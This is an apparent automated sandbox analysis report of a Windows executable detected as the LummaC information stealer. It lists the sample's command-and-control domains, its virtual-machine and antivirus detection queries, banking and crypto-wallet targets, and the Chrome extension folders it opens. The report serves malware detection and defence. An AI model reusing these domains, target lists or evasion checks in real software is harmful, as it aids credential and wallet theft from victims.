Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.7:49978 version: TLS 1.2

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Process Stats: CPU usage > 49%

Source: yTcaknrrb8.exe, 00000000.00000000.1235261246.000000000117D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSOhort-datNe9d.exe@ vs yTcaknrrb8.exe
Source: yTcaknrrb8.exe, 00000000.00000003.3011162259.0000000004A3D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSOhort-datNe9d.exe@ vs yTcaknrrb8.exe
Source: yTcaknrrb8.exe	Binary or memory string: OriginalFilenameSOhort-datNe9d.exe@ vs yTcaknrrb8.exe

Source: yTcaknrrb8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: yTcaknrrb8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yTcaknrrb8.exe, 00000000.00000003.3037649728.0000000008B48000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3048721065.0000000008B40000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3037992725.0000000008B2A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: yTcaknrrb8.exe	ReversingLabs: Detection: 39%
Source: yTcaknrrb8.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

File read: C:\Users\user\Desktop\yTcaknrrb8.exe

Jump to behavior

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: yTcaknrrb8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: yTcaknrrb8.exe

Static file information: File size 2954240 > 1048576

Source: yTcaknrrb8.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2a8000

Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: yTcaknrrb8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: yTcaknrrb8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: yTcaknrrb8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Admin\Workspace\1994844261\Project\Release\Project.pdb source: yTcaknrrb8.exe

Source: yTcaknrrb8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yTcaknrrb8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yTcaknrrb8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yTcaknrrb8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yTcaknrrb8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: yTcaknrrb8.exe

Static PE information: section name: .fptable

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCB4E pushad ; retf	0_3_01CDCB61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF41 push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF5E pushad ; iretd	0_3_01CDCF61
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDCF6E push eax; iretd	0_3_01CDCF55
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDC368 push 6801CDC3h; ret	0_3_01CDC36D
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDC366 push 6801CDC3h; ret	0_3_01CDC36D
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Code function: 0_3_01CDC368 push 6801CDC3h; ret	0_3_01CDC36D

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\yTcaknrrb8.exe TID: 6400

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001CAC000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHx
Source: yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CF2000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090568585.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CF2000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090568585.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.z
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: yTcaknrrb8.exe, 00000000.00000003.3048314973.0000000008B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: yTcaknrrb8.exe, 00000000.00000002.3113706489.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: begguinnerz.biz

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: yTcaknrrb8.exe, yTcaknrrb8.exe, 00000000.00000003.3090568585.0000000001CDA000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090714367.0000000001CDB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\yTcaknrrb8.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: yTcaknrrb8.exe PID: 2436, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: yTcaknrrb8.exe, 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20
Source: yTcaknrrb8.exe, 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],0
Source: yTcaknrrb8.exe	String found in binary or memory: Jaxx Liberty
Source: yTcaknrrb8.exe, 00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: yTcaknrrb8.exe, 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: yTcaknrrb8.exe	String found in binary or memory: ExodusWeb3
Source: yTcaknrrb8.exe, 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",
Source: yTcaknrrb8.exe, 00000000.00000003.3079860899.0000000001CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: yTcaknrrb8.exe, 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
